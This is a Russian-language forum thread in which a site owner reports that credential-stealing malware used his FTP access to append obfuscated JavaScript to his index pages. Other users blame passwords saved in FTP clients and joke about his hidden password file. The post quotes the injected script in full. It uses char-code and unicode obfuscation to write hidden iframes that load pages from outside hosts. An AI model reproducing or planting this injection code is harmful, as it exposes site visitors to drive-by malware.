ВИРУС залезший через FTP

[kpp]

ВИРУС залезший через FTP

У меня на сайте вирус или какая-то другая программа троянского типа делает следующее!
Она берё и записывеает в конец индексных файлов пишет это:

<meta name="robots" content="all" /><SCRIPT LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!119!105!100!116!104!61!49!32!104!101!105!103!104!116!61!49!32!98!111!114!100!101!114!61!48!32!102!114!97!109!101!98!111!114!100!101!114!61!48!32!115!114!99!61!39!104!116!116!112!58!47!47!98!101!110!115!97!120!46!105!110!102!111!47!105!110!100!101!120!50!46!104!116!109!108!39!62!60!47!105!102!114!97!109!101!62!13!10!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT>
<meta name="revisit-after" content="1 days" /><script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006b\u0072\u0075\u0074\u0069\u006b\u002e\u0069\u006e\u0066\u006f\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0030\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script><!-- ~ --><meta name="robots" content="all" /><SCRIPT LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!119!105!100!116!104!61!49!32!104!101!105!103!104!116!61!49!32!98!111!114!100!101!114!61!48!32!102!114!97!109!101!98!111!114!100!101!114!61!48!32!115!114!99!61!39!104!116!116!112!58!47!47!98!101!110!115!97!120!46!105!110!102!111!47!105!110!100!101!120!50!46!104!116!109!108!39!62!60!47!105!102!114!97!109!101!62!13!10!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT>
<meta name="revisit-after" content="1 days" /><!-- ~ -->

У меня как минимум 100 индексных файлов!!
Хочу ещё сказать, что это произошло 2 раз (в коде можно увидеть) с интервалом в 2 месяца. Были атакованы 2 сайта (значит это произошло посредствам доступа к FTP)

Что делать?
Писать скрипт открывающий все папки и удаляющий последовательность такую, какую мне вирус написал? А как предотвратить последующее появление вируса?

 

[varan]

Re: ВИРУС залезший через FTP

У нас было такое.
Пароли в total commander'e хранишь?
Не храни пароли от фтп в доступных местах, вот и всё

 

[kpp]

у меня SmartFTP
Пароли в нём. Я сначала думал, что смарт фтп может слабая прога. А у вас в total commander'e такие вещи.

(вообще я прятал файлик со всеми паролями на диск G в кое-какой папке, сказать не могу, мало ли та программа пропарсит этот топик и тогда кранты! там все пароли)

А для избавления придётся скрипт писать, который прочистит все индексные файлы?
Сегодня я убил час на прочистку всех индексов в надежде на то, что это был последний раз.

 

[varan]

ну, видимо, программа понимает многие популярные фтп-клиенты

(вообще я прятал файлик со всеми паролями на диск G в кое-какой папке, сказать не могу, мало ли та программа пропарсит этот топик и тогда кранты! там все пароли)

Жжош

 

[tf]

kpp, ОТДАЙ ФАЙЛИК =)))

 

[Vladson]

>>> видимо, программа понимает многие популярные фтп-клиенты
Не видимо а так и есть, гуглем-то умеем пользоваться ?

 

[zerkms]

вообще я прятал файлик со всеми паролями на диск G в кое-какой папке, сказать не могу, мало ли та программа пропарсит этот топик и тогда кранты! там все пароли

лол

 

[Mr_Max]

В юмор
адназначна
(с) Жириновский.